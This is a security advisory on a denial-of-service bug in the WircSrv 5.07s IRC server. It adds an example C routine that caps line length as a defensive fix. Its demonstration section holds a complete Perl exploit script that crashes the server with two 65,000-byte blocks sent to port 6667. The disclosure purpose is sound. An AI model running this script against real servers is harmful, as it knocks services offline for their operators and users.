WircSrv Subject to DoS

 
WircSrv Subject to Denial of Service
Reported July 10, 2000 by USSRLabs

VERSIONS AFFECTED
WircSrv 5.07s

DESCRIPTION

The WircSrv IRC Server product contains an unchecked buffer that could lead to denial of service attacks against the service. By sending a command string that is approximately 65000 characters in length, a buffer will overflow and crash the service.
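The server-side check whose absence is described above, as an added example that is not WircSrv code or part of the USSRLabs advisory: a line framer that caps each IRC message at 512 bytes (the RFC 1459 limit, an assumption not stated in the advisory) and reports an over-long line instead of copying it. The names `irc_framer`, `irc_feed` and `on_line` are hypothetical, and the input is constructed.

```c
/* Added example, not WircSrv code: bounded IRC line framing. */
#include <stdio.h>
#include <string.h>

#define IRC_MAX_LINE 512  /* RFC 1459 message limit, CR-LF included (assumption) */

typedef struct {
    char   buf[IRC_MAX_LINE];
    size_t len;         /* bytes of the current, still unterminated line */
    int    overflowed;  /* set once a line exceeds the limit: disconnect the peer */
    int    lines;       /* complete lines accepted so far */
} irc_framer;

/* Hypothetical hook: a real server would parse the command here. */
static void on_line(irc_framer *f, const char *line, size_t n) { (void)line; (void)n; f->lines++; }

/* Feed one recv() chunk of any size. Returns 0 on success, -1 once the peer
 * has sent more than IRC_MAX_LINE bytes without a CR-LF. Never writes past buf. */
int irc_feed(irc_framer *f, const char *data, size_t n)
{
    if (f->overflowed) return -1;
    for (size_t i = 0; i < n; i++) {
        if (f->len == IRC_MAX_LINE) {      /* buffer full, no terminator seen */
            f->overflowed = 1;
            return -1;
        }
        f->buf[f->len++] = data[i];
        if (f->len >= 2 && f->buf[f->len - 2] == '\r' && f->buf[f->len - 1] == '\n') {
            on_line(f, f->buf, f->len - 2);
            f->len = 0;                    /* start the next line */
        }
    }
    return 0;
}

int main(void)
{
    static char block[65000];              /* constructed: one oversized block */
    memset(block, 'A', sizeof block);
    const char ok[] = "NICK test\r\nUSER a b c :d\r\n";  /* constructed */
    irc_framer f = {0};
    int r1 = irc_feed(&f, ok, sizeof ok - 1);
    printf("normal traffic: rc=%d lines=%d\n", r1, f.lines);
    int r2 = irc_feed(&f, block, sizeof block);
    int r3 = irc_feed(&f, block, sizeof block);
    printf("oversized blocks: rc=%d rc=%d overflowed=%d\n", r2, r3, f.overflowed);
    return 0;
}
```

On the first `-1` the caller should close the connection; logging the source address at that point also gives operators a detection signal for this class of input.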

DEMONSTRATION

-------------------------Start File--------------------
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# WircSrv Version 5.07s Remote DoS attack
# send 2 64k blocks of data causes the server to crash.
#########################################################
use Getopt::Std;
use Socket;

getopts("s:", \%args);
if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # this is the NOP
$number = "65000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args{s}; # remote server
$port = 6667; # remote port, default is 6667
$buf = "$data"; # issue this response to the server

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname("tcp") || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");

sub usage {die("\n\nExploit by USSRLabs www.ussrback.com\nWircSrv Version 5.07s Remote DoS attack\nsend 2 64k blocks of data causes the server to crash.\n -s server_ip\n\n");}
-------------------------End File----------------------

VENDOR RESPONSE

The vendor is aware of the problem; however, no response was known at the time of this writing.

CREDITS
Discovered and reported by USSRLabs
